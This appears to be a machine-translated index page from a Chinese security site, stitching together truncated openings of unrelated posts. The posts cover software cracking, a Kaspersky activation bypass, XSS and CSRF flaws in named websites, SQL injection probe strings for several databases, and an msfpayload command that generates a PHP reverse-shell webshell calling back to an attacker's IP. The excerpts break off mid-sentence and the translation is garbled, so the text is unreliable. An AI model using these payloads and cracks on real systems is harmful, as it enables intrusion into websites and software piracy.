Cloud Security

The 24-bit md5 algorithm appears in the dedecms password. In fact, it is very simple: Dedecms first encrypts and obtains the 32-bit MD5 encrypted ciphertext, and then removes the next 8 bits. In this way, the remaining 24 bits are used as the

Author: zhxflDescription: A complete cracking attack was launched here for beginners to practice. This topic is only available for research purposes. VB program, and compare the breakpoint bpx _ vbaStrCmp (executed in the cmd box)Undo the breakpoint

For newer versions of delphi, you cannot use DEDE to find button events. Here I find a quick way to find button events.Use OD to load a small program written in Delphi 2009, ctrl + g to 401000, 00401000./04104000 DD Project1.0040100400401004 \ 03 DB

About a month ago, I was prepared to study encryption and decryption carefully. During this period, I was confused by the compilation language, the classic "encryption and decryption (the third edition)", a series of related tools and documents, etc,

1. breakpoint: The so-called breakpoint is where the program is interrupted. This word is no longer familiar to the decrypted. So what is interruption? Interruption occurs because of a special event (interruption event). The computer suspends the

From bad wolf Security I used to get the permanent free activation method of Kabbah 6.0. Today I tried KIS7.0.0.125 and found that it could be used! Kabbah! I thought the new version would definitely change the Registry location ...... I did not

Preface:I read some articles from other people and summarized the following rules for ease of use. ***** 1A3 represents the last three digits of the virtual address. It is estimated that everyone and I should be the same. The first thing to do is to

[Article Title]: Extra Drive Pro algorithm analysis history[Author]: wawazi[Author mailbox]: wanzailuan@yahoo.com.cn[Software name]: Extra Drive Pro[]: Html "> http://www.skycn.com/soft/19661.html[Shelling method]: ASPACK[Language]: KP Win32 1.x->

  Brief description: Some of the new functions of Douban station have the Cross-Site Scripting Vulnerability (which was found when the program was tested for stability ). Detailed Description: --- {'id': 1, 'type':'s-x', 'method': 'post',

  By: stuffy beans   I saw a website today. The upload vulnerability exists.   But the tragedy is that. How to transfer. Are all blank. Experience tells me. I met a first-class monitoring system.   Checks whether an invalid character exists in the

######################################## ################ Author: Crazy_Hacker# Script: Mevin Basic PHP Events Lister v2.03# Exploit type: CSRF Vulnerability [Add & Delete Admin]# Download:

  PHP-Barcode 0.3pl1 Remote Code Execution   The input passed to the code parameter is not sanitized and is used on A popen () function. This allows remote command execution and also Allows to see environment vars:   Windows  

1. generate the WEBSHELL file msf> msfpayload php/reverse_php LHOST = Your ip lport = port R> dis9.php my BT4 is in the/ROOT/directory. Then, run dis9.php before passing dis9.php into your for example, www.dis9.com/dis9.php 2 in SHELL. then MSF sets

I used to publish an article on IP injection attacks in the QQ space. This injection is actually not mysterious, but often ignored.There are several ways to forge an IP address. One is to modify an IP data packet. If you are interested, you can

100e has several XSS (the order is processed in the background ...) One of the effects on all users, especially order administrators, is generated in the order to form a storage type XSS, asking order handlers, should have seen a strange pop-up

Suppose such an injection point: show.html? Id = 2 mysql: id = 2 and version ()> 0 oracle: id = 2 and '1' | '1' = '11 others are welcome to add 1 # upload | Access: aNd aSc (cHr (97 )) = 97 and exists (select id from MSysAccessObjects) SQL Server:

This is an XSS of YY game live broadcast. It was reported that there is no harm (reflected XSS, it seems that most of them have no actual harm), so I will come here to write why it can play a box. It is teaching. In fact, I have not yet reached the

1. small-scale tests show that more than 500 followers are listed. 2. this site is not fortified with CSRF, And the GET method is directly used to add attention and messages, which can lead to CSRF worms; 3. I want to share a story about how

Affected products: CosCms developers: http://www.coscms.org defects affected versions: 1.721 and probably prior beta versions: 1.721Analysis: High-Tech Bridge Security Research Lab discovered vulnerability in CosCms, which can be exploited to

1. What went wrong was this place! Http://weiba.weibo.com 2. This site almost no CSRF to do any prevention, but with attention to brush fans of places except ah! Here are two examples: 3. the first is to support Weibo. The support for Weibo is not